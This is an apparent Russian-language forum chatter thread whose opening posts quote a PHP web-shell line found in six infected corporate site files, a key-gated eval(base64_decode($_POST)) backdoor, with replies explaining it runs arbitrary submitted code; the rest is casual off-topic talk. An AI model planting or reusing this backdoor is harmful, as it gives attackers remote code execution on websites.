Что нового

Болталка, флудилка и тд...... (2 просмотра)

• Автор темы Воланд
  • Дата начала
Статус
Закрыто для дальнейших ответов.
на одном из корпоративных сайтов на работе нашел 6 зараженных файлов с вот таким кодом:<?php //if($_POST["key"]=="2f041f9e24d1d1f4e69e515a00777eac"){eval(base64_decode($_POST["code"]));die();} ?>кто может растолковать чем он опасен?

Любой закодированный в base64 код, отправленный пост-запросом, будет выполнятся, если будет введен указанный ключ.

JustElectro,понятно, спс

Цитата: JustElectroЛюбой закодированный в base64 код, отправленный пост-запросом, будет выполнятся, если будет введен указанный ключ.Бред полнейший.Цитата: serGUCCI<?php //if($_POST["key"]=="2f041f9e24d1d1f4e69e515a00777eac"){eval(base64_decode($_POST["code"]));die();} ?>В данной ситуации приходит post запрос в base64, затем исполняется функцией eval.

Мне вот стало интересно что станет с нами и чем мы будем заниматься через 10 лет!? Скрипка интересно будет та же или новая?) Смысл задуматься о жизни, и что это вдруг мне стукнуло в голову...

по ходу скоро заработает Скрипка v.3

Цитата: Гульсиначем мы будем заниматься через 10 летДетьми.

nadz3r.js, Когда епнет, уже будет похрен чем ты там занимался :DА самый первый вариант чем заниматься через 10 лет - дети.

Блин, че то настроение с утра плохое, так и хочется в кого-то говном бросить

Блин, через несколько часов предстоит 7ми часовой перелёт, а у меня от волнения ноет живот как перед приемом к стоматологу)))))))))

Вытащили на работу в воскресенье!!!несправедливость блин!Но кое-что произошло))))Много таких но этот особенный.Разговор.Я-Добрый день,оператор[на суть как важно] чем я могу вам помочь?Он-Я скачал программу для скачивания музыки с вконтакте, после установки интернета не стало.Я-Продиктовала ему от А до Я как деинсталлировать этот мусор,он меня в упор не понял,соединила его с технической поддержкой,вроде бы разобрались.Около часа спустя,меня снова соединяют с этим молодым человеком,и история разворачивается по новой.Скинула заявку мастерам,они до него доехали,всё сделали,всё работает.Когда ехала домой,всё думала об этом криворуке. Зачем люди качают не понятно что не понятно откуда,когда есть десятки проверенных дополнений для большинства браузеров???!

kerosin, и меня интересует это вопрос.И какие глобальные изменения будут, помимо нового шаблона?))

надеюсь это обновление оживит портал

Цитата: kerosinТак че таки выйдет скоро скрипка 3?Как только, так сразу.Цитата: Artem2011и меня интересует это вопрос.И какие глобальные изменения будут, помимо нового шаблона?))Почаще надо было заходить на форум. Уже 10 раз обсуждалось :)

что же мне так не везет(((( поехала отдыхать, телефон в одной стране посеяла, сижу в другой с больным горлом, и вчера меня так обрадовали, мою квартиру обнесли. после полиции там наверное все в порошке, боюсь даже возвращаться.

Цитата: Гульсинаквартиру обнеслиэто как?зы давай держись все будет хорошо

Статус
Закрыто для дальнейших ответов.

Пользователи, просматривающие данную тему

Верх